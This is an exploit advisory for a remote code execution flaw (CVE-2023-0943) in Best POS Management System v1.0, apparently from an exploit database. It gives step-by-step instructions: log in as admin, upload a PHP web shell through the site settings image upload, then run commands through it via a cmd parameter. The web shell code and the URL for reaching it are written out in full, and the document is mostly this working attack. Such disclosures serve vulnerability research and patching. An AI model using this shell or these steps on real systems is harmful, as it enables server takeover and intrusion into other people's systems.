# Exploit Title: Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload# Google Dork: NA# Date: 17/2/2023# Exploit Author: Ahmed Ismail (@MrOz1l)# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip# Version: 1.0 # Tested on: Windows 11# CVE : (CVE-2023-0943)### Steps to Reproduce1- Login as Admin Rule
2- Head to " http://localhost/kruxton/index.php?page=site_settings"3- Try to Upload an image here it will be a shell.php
```
shell.php
``````
<?php system($_GET['cmd']); ?>4- Head to http://localhost/kruxton/assets/uploads/5- Access your uploaded Shell
http://localhost/kruxton/assets/uploads/1676627880_shell.png.php?cmd=whoami
